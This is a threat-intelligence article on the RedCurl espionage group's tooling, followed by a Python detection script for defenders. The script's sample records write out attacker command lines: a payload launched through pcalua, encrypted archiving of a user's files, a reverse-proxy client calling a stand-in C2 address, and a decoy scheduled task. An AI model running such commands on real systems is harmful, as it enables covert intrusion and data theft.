The RedCurl Advanced Persistent Threat (APT) group, also known as Earth Kapre or Red Wolf, has resurfaced with a series of cyber espionage campaigns targeting multiple Canadian organizations in late 2023 and 2024, according to a recent report by Huntress. Historically, this group has specialized in stealthy data theft, avoiding tactics like ransomware or monetary extortion. Instead, their focus lies on exfiltrating sensitive information such as corporate emails and confidential files.
RedCurl’s operations exhibit an impressive degree of sophistication, leveraging living-off-the-land binaries (LOLBins) to minimize their footprint. The group’s arsenal includes:
- Use of Pcalua.exe as a LOLBin: This rarely exploited binary was employed to execute malware through scheduled tasks that mimicked legitimate Windows system processes. “The attackers used pcalua.exe to launch the malware via scheduled tasks,” Huntress noted.
- Data Exfiltration with 7zip: RedCurl relied heavily on 7zip to collect, archive, and encrypt stolen data before exfiltrating it to cloud storage such as bora.teracloud[.]jp. The original files were deleted after exfiltration to reduce the chance of detection.
- Proxy Tunnels with Python: Utilizing the RPivot tool, the group set up reverse proxy tunnels through Python scripts to establish connections to command-and-control (C2) servers. The Python script used in the command (cl.py) matches the RPivot proxy tool script called client.py.
- PowerShell for Downloads and Execution: RedCurl crafted PowerShell commands to download malware payloads, including temporary files like revtun1.tmp and revtun2.tmp, which were then unarchived and executed.
The group deployed a customized backdoor, dubbed RedLoader, which featured:
- Dynamic DLL resolution: Using encrypted strings decrypted via a rolling XOR routine to resolve sensitive DLLs like bcrypt.dll.
- Scheduled task manipulation: Tasks were camouflaged under names resembling legitimate services, such as SilentCleanup or Usb-Notifications, ensuring persistence while evading detection.
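The behaviours listed above (pcalua.exe as a launcher, password-protected 7zip archives, a Python client named cl.py, scheduled tasks under borrowed names) are all visible in process-creation telemetry. The following is an added triage example, not code from Huntress or the report: it runs simple rules over constructed Sysmon-style records; the command lines, paths and the use of pcalua.exe's -a switch are assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records in the spirit of Sysmon Event ID 1
# (image path, command line). Sample data, not telemetry from the Huntress report.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\pcalua.exe", r"pcalua.exe -a C:\Users\Public\revtun1.exe"),
    (r"C:\Users\Public\7z.exe", r"7z.exe a -pSECRET -mhe=on C:\Users\Public\st.7z C:\Users\alice\Documents"),
    (r"C:\Users\Public\py\python.exe", r"python.exe cl.py --server-ip 203.0.113.10 --server-port 443"),
    (r"C:\Windows\System32\schtasks.exe", r'schtasks /create /tn "Usb-Notifications" /tr "C:\Users\Public\revtun2.exe" /sc minute'),
    (r"C:\Windows\System32\schtasks.exe", r'schtasks /create /tn "SilentCleanup" /tr "C:\Windows\System32\cleanmgr.exe"'),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe notes.txt"),
]

DECOY_TASK_NAMES = {"silentcleanup", "usb-notifications"}   # task names cited in the report

def _image_name(image):
    return PureWindowsPath(image).name.lower()

def _task_action_outside_windows(cmdline):
    """True when the /tr action points at a path that is not under C:\\Windows."""
    m = re.search(r'/tr\s+"?([^"]+?)"?(?:\s|$)', cmdline, re.IGNORECASE)
    return bool(m) and not m.group(1).lower().startswith(r"c:\windows")

def classify(image, cmdline):
    """Return the matching rule name, or None when the record looks benign."""
    name, cl = _image_name(image), cmdline.lower()
    if name == "pcalua.exe" and " -a " in cl:
        return "pcalua-proxy-launch"            # LOLBin used to start another binary
    if name in {"7z.exe", "7za.exe", "7zr.exe"} and re.search(r"\s-p\S*", cl) and " a " in cl:
        return "7zip-encrypted-staging"         # password-protected archive ahead of exfil
    if name.startswith("python") and re.search(r"\b(cl|client)\.py\b", cl):
        return "rpivot-style-proxy-client"      # cl.py matched RPivot's client.py
    if name == "schtasks.exe" and "/create" in cl:
        tn = re.search(r'/tn\s+"?([^"\s]+)"?', cl)
        if tn and tn.group(1) in DECOY_TASK_NAMES and _task_action_outside_windows(cmdline):
            return "decoy-task-name"            # legitimate-looking name, non-system action
    return None

def triage(events):
    """Run every record through classify() and keep only the hits."""
    return [(rule, cmd) for img, cmd in events if (rule := classify(img, cmd))]

if __name__ == "__main__":
    for rule, cmd in triage(SAMPLE_EVENTS):
        print(f"{rule:28} {cmd}")
```

The genuine SilentCleanup task runs cleanmgr.exe from System32, so the path check keeps the real task out of the hit list while flagging a same-named task whose action lives in a user-writable directory.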
RedCurl APT group’s victims spanned industries such as finance, construction, tourism, and consulting. The group’s recent campaigns primarily targeted Canadian organizations but included broader activity in regions where their tradecraft has been previously observed. Their use of legitimate cloud services for data exfiltration underscores their focus on stealth and operational security.
Huntress aptly concluded, “When a threat actor is motivated by cyberespionage, it drives them to remain undetected for as long as possible.” Their emphasis on blending in with legitimate activity presents a formidable challenge for defenders, necessitating layered defenses and vigilant monitoring.